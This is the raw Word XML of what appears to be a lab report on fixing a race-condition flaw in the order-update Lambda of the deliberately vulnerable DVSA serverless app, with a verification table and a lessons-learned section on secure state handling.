            <w:tcW w:w="17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3CD3BE95" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Changed status check in DVSA-ORDER-UPDATE Lambda from &gt; 110 to != 100. This ensures updates are only accepted when the order is strictly in open state. Deployed via AWS Lambda console.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="183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22432489" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">After </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>fix</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>, setting order status to 110 via DynamoDB and then attempting an update returns order already paid. The race condition no longer allows quantity modification during billing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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50" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="04DD5D69" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CloudWatch logs for DVSA-ORDER-UPDATE show the error response being returned correctly after the fix. DynamoDB confirms </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>itemList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> remains unchanged when update is blocked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="501675AC" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08AD3628" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 10) Takeaway / Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78035ADE" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This vulnerability demonstrates that security is not only about input validation or authentication — business logic flaws can be equally dangerous and often harder to detect. The race condition in DVSA exists because the application was designed to handle each request independently without considering what happens when two requests arrive at the same time for the same resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C1FBA6" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DFD2AB" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In serverless architectures, race conditions are particularly relevant because Lambda </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>functions scale</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> horizontally and multiple instances can process requests for the same order simultaneously. Without proper state locking or atomic operations, any multi-step workflow is potentially vulnerable to timing attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA1A8EA" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D9D4BA" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The key secure design principles illustrated by this lesson are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC2B47E" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Implement strict state machine validation — only allow transitions that are explicitly permitted from the current state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B932634" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Use atomic database operations such as DynamoDB conditional writes to prevent concurrent modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572D9053" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Lock critical resources during multi-step workflows to prevent race conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A06AEAD" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Never allow business-critical fields such as quantity or price to be modified after payment has started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67D340" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Test workflows under concurrent load to discover timing vulnerabilities before attackers do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53202520" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Apply the principle of least privilege to state transitions — if in doubt, block the operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133D2587" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A5297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322F38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B7A4C0C"/>
    <w:lvl w:ilvl="0" w:tplc="EFCE67E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="EC3C8268">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="454848A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8494BF9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9DE00E32">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D90E7422">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="AC6400DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1CF08AD0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D06A065A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="773576B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4866E14"/>
    <w:lvl w:ilvl="0" w:tplc="6944CD3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="261C73AC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F68AC80C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="29E6BAD8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="61E294FC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="36FA9968">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B856380A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="58FC2C36">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9716A4F0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="459491937">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="10242149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975"/>
    <w:rsid w:val="00A52975"/>
    <w:rsid w:val="00D278E0"/>
    <w:rsid w:val="00D72059"/>
    <w:rsid w:val="00F91C94"/>
    <w:rsid w:val="00FF11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6A005"/>
  <w15:docId w15:val="{39731EB6-0049-4C2C-AE80-5FF71F0BF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spacing w:before="320" w:after="160"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E4057"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="100"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F6AA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2060</Words>
  <Characters>11742</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>97</Lines>
  <Paragraphs>27</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13775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 ABBAS ALMUHANNA</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-03T07:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-03T08:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>